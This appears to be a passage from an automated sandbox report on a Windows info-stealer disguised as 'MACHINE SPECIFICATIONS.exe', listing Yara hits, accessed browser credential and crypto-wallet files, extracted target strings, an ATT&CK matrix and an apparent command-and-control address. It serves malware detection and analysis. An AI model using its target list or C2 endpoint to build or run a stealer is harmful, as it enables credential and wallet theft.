                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.258866341.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.260326785.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.259617695.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6376, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6432, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: l1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.258866341.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.260326785.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.259617695.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6376, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6432, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.258866341.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.260326785.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.259617695.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6376, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6432, type: MEMORYSTR
                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts221
                        Windows Management Instrumentation
                        Path Interception111
                        Process Injection
                        1
                        Masquerading
                        1
                        OS Credential Dumping
                        1
                        Query Registry
                        Remote Services1
                        Archive Collected Data
                        Exfiltration Over Other Network Medium1
                        Encrypted Channel
                        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default Accounts1
                        Native API
                        Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                        Disable or Modify Tools
                        LSASS Memory331
                        Security Software Discovery
                        Remote Desktop Protocol3
                        Data from Local System
                        Exfiltration Over Bluetooth11
                        Non-Standard Port
                        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)231
                        Virtualization/Sandbox Evasion
                        Security Account Manager11
                        Process Discovery
                        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                        Non-Application Layer Protocol
                        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                        Process Injection
                        NTDS231
                        Virtualization/Sandbox Evasion
                        Distributed Component Object ModelInput CaptureScheduled Transfer2
                        Application Layer Protocol
                        SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                        Hidden Users
                        LSA Secrets1
                        Application Window Discovery
                        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common21
                        Obfuscated Files or Information
                        Cached Domain Credentials1
                        Remote System Discovery
                        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                        Software Packing
                        DCSync123
                        System Information Discovery
                        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                        Timestomp
                        Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        MACHINE SPECIFICATIONS.exe19%VirustotalBrowse
                        MACHINE SPECIFICATIONS.exe15%ReversingLabsWin32.Trojan.AgentTesla
                        No Antivirus matches
                        SourceDetectionScannerLabelLinkDownload
                        1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack100%AviraHEUR/AGEN.1216612Download File
                        SourceDetectionScannerLabelLink
                        api.ip.sb4%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        http://service.r0%URL Reputationsafe
                        http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                        http://tempuri.org/0%URL Reputationsafe
                        http://ns.adobe.c/g0%URL Reputationsafe
                        http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                        http://go.micros0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                        http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                        https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                        http://185.222.58.90:179100%VirustotalBrowse
                        http://185.222.58.90:179100%Avira URL Cloudsafe
                        http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                        http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                        http://tempuri.org/00%URL Reputationsafe
                        http://support.a0%URL Reputationsafe
                        http://ns.adobe.cobj0%URL Reputationsafe
                        http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                        http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                        https://helpx.ad0%URL Reputationsafe
                        http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnviron0%URL Reputationsafe
                        https://get.adob0%URL Reputationsafe
                        http://tempuri.org/t_$k0%Avira URL Cloudsafe
                        http://185.222.58.90:10%Avira URL Cloudsafe
                        http://185.222.58.90:17910/0%Avira URL Cloudsafe
                        http://forms.rea0%URL Reputationsafe
                        http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                        http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
                        http://ns.ado/10%URL Reputationsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ip.sb
                        unknown
                        unknowntrueunknown
                        NameMaliciousAntivirus DetectionReputation
                        http://185.222.58.90:17910/true
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabtmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                          high
                          http://service.rMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://duckduckgo.com/ac/?q=tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                            high
                            https://support.google.com/chrome/?p=plugin_wmpMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://support.google.com/chrome/answer/6258784MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://tempuri.org/Endpoint/EnvironmentSettingsMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/soap/envelope/MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://support.google.com/chrome/?p=plugin_flashMACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/soap/envelope/DMACHINE SPECIFICATIONS.exe, 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://ns.adobe.c/gMACHINE SPECIFICATIONS.exe, 00000001.00000003.364123471.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.350858355.0000000009161000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364140812.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364246752.0000000009174000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://support.google.com/chrome/?p=plugin_javaMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Endpoint/VerifyUpdateResponseMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://go.microsMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Endpoint/SetEnvironmentMACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Endpoint/SetEnvironmentResponseMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Endpoint/GetUpdatesMACHINE SPECIFICATIONS.exe, 00000001.00000002.365714894.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://support.google.com/chrome/?p=plugin_realMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.ipify.orgcookies//settinString.RemovegMACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                          • URL Reputation: safe
                                          unknown
                                          http://185.222.58.90:17910MACHINE SPECIFICATIONS.exe, 00000001.00000002.365714894.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.interoperabilitybridges.com/wmp-extension-for-chromeMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://support.google.com/chrome/?p=plugin_pdfMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://support.google.com/chrome/?p=plugin_divxMACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_SlMACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://tempuri.org/Endpoint/VerifyUpdateMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://tempuri.org/0MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://forms.real.com/real/realone/download.html?type=rpsp_usMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://support.aMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://ipinfo.io/ip%appdata%MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        high
